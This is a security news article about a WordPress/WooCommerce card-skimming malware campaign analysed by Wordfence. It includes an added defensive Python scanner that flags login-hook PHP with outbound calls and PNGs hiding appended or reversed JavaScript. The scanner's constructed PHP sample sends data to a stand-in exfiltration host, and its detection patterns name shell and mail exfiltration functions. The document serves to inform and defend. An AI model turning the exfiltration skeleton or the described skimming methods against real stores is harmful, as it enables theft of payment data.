A sophisticated malware campaign has emerged, specifically targeting WordPress e-commerce sites that utilize the WooCommerce plugin for processing customer transactions.
This threat was uncovered in August 2025 and showcases advanced evasion techniques, coupled with a multi-layered approach to credit card data harvesting designed to elude traditional security measures.
The malware masquerades as a rogue WordPress plugin, incorporating custom encryption methods, deceptive image files that hide its malicious payload, and a resilient backdoor framework that permits attackers to deploy additional code at will.
Installation requires administrator-level privileges, which attackers typically obtain through compromised credentials or vulnerable plugins.
Once activated, the malware operates stealthily, hiding itself from the WordPress plugin directory to reduce the chance of detection, while setting tracking cookies and meticulously logging administrator activity across the compromised site.
Analysts from Wordfence identified and cataloged this malware after receiving a comprehensive sample on August 21, 2025.
Four detection signatures were developed and disseminated to Wordfence Premium, Care, and Response customers between August 27 and September 9, 2025; free users received these signatures after the customary 30-day delay.
This threat poses a substantial risk to online merchants and their clientele, as the malware systematically captures and exfiltrates sensitive payment information.
Advanced Persistence and Command-and-Control Infrastructure
The malware exhibits resilience through a complex array of redundancy layers. It captures WordPress user credentials during login by employing the wp_authenticate_user filter and wp_login action hooks, exfiltrating this data to servers under the attacker’s control.
The payload injection mechanism is executed via deceptive PNG image files that harbor reversed and encoded JavaScript, distributed across three discrete files: a custom payload updated through an AJAX backdoor, a dynamic payload refreshed daily, and a fallback static replica.
The JavaScript skimmer is activated on WooCommerce checkout pages, using a three-second delay to circumvent form conflicts. It attaches event listeners to capture card numbers, expiration dates, and CVV values, which are then transmitted back through AJAX POST requests.

The PHP exfiltration module employs multiple fallback transports, including native cURL, file_get_contents, the system shell's curl binary, and email dispatch, ensuring that captured data can reach the attackers across a variety of server environments.
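As an added defensive example (not code from the Wordfence analysis or the article), the following Python script triages the two artefact classes the preceding paragraphs describe: PHP files that register the wp_authenticate_user or wp_login hooks alongside outbound primitives (cURL, file_get_contents, shell execution, mail), and PNG files that carry data after the IEND chunk or contain reversed JavaScript keywords. The hook names and PHP functions are real WordPress/PHP APIs; the sample PHP source, the minimal PNG, the appended blob and the marker list are constructed here for illustration.

```python
"""Triage scanner for the artefacts described in the article.

Added example: heuristics only, not the Wordfence signatures.
"""
import re
import struct
import zlib
from pathlib import Path
from typing import Dict, List

# Hooks the article says the rogue plugin abuses to capture logins.
LOGIN_HOOKS = ("wp_authenticate_user", "wp_login")
HOOK_RE = re.compile(
    r"add_(?:filter|action)\(\s*['\"](" + "|".join(LOGIN_HOOKS) + r")['\"]"
)
# Outbound primitives the article lists as exfiltration fallbacks.
EXFIL_RE = re.compile(
    r"\b(curl_init|curl_exec|file_get_contents|shell_exec|exec|system|passthru|wp_mail|mail)\s*\("
)
# JavaScript tokens a reversed payload would contain backwards (constructed list).
REVERSED_JS_MARKERS = [m[::-1] for m in (b"function", b"document", b"addEventListener", b"XMLHttpRequest")]
PNG_SIG = b"\x89PNG\r\n\x1a\n"


def scan_php_source(src: str) -> Dict[str, object]:
    """Flag PHP that hooks the login flow *and* has a way to send data out."""
    hooks = sorted(set(HOOK_RE.findall(src)))
    prims = sorted(set(EXFIL_RE.findall(src)))
    return {"login_hooks": hooks, "exfil_primitives": prims, "suspicious": bool(hooks and prims)}


def png_trailing_bytes(data: bytes) -> int:
    """Bytes after the IEND chunk: 0 for a clean PNG, -1 if not a parseable PNG."""
    if not data.startswith(PNG_SIG):
        return -1
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4  # header + chunk data + CRC
        if ctype == b"IEND":
            return len(data) - pos
    return -1  # truncated or malformed chunk list


def find_reversed_js(data: bytes) -> List[str]:
    """Return the JS keywords whose reversed spelling appears in the bytes."""
    return [m[::-1].decode() for m in REVERSED_JS_MARKERS if m in data]


def scan_directory(root: str) -> List[str]:
    """Walk a plugin or uploads tree and return human-readable findings."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.suffix.lower() == ".php":
            r = scan_php_source(path.read_text(errors="replace"))
            if r["suspicious"]:
                findings.append(f"{path}: hooks {r['login_hooks']} with outbound calls {r['exfil_primitives']}")
        elif path.suffix.lower() == ".png":
            data = path.read_bytes()
            extra, rev = png_trailing_bytes(data), find_reversed_js(data)
            if extra > 0 or rev:
                findings.append(f"{path}: {extra} bytes after IEND, reversed JS markers {rev}")
    return findings


def build_minimal_png() -> bytes:
    """Construct a valid 1x1 greyscale PNG skeleton (IHDR + IEND) for testing."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IEND", b"")


# Constructed samples: a clean PNG, the same PNG with a reversed JS blob appended,
# and two PHP skeletons (one shaped like the described plugin, one benign).
CLEAN_PNG = build_minimal_png()
APPENDED_BLOB = b"function(){document.cookie}"[::-1]
TAINTED_PNG = CLEAN_PNG + APPENDED_BLOB
SAMPLE_PHP = """<?php
// Constructed skeleton in the shape the article describes; does nothing.
add_filter('wp_authenticate_user', 'rp_capture', 10, 2);
add_action('wp_login', 'rp_after_login');
function rp_send($payload) {
    /* curl_exec(...) */
    file_get_contents('https://EXFIL-HOST.example/collect');
}
"""
BENIGN_PHP = """<?php
add_action('wp_login', 'lt_record_login', 10, 2);
function lt_record_login($user_login, $user) {
    update_user_meta($user->ID, 'last_login', time());
}
"""

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_PHP), scan_php_source(BENIGN_PHP))
    print(png_trailing_bytes(CLEAN_PNG), png_trailing_bytes(TAINTED_PNG), find_reversed_js(TAINTED_PNG))
```

The PHP heuristic is a triage signal rather than proof: a legitimate login-notification plugin also hooks wp_login and calls wp_mail, so findings need a manual read. The IEND check is the more robust of the two, since any payload appended to an otherwise valid image shows up as trailing bytes regardless of how it is encoded, whereas the reversed-keyword check only catches the plain reversal the article mentions and not a further base64 layer.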
The analysis links this malware to Magecart Group 12, substantiated by the SMILODON identifier found within command-and-control server URLs and coding patterns that align with previous activities of the threat actors.
This campaign highlights the persistent threats faced by WordPress e-commerce platforms, underlining the critical necessity for maintaining updated security protocols and vigilant monitoring systems.
Source link: Cybersecuritynews.com.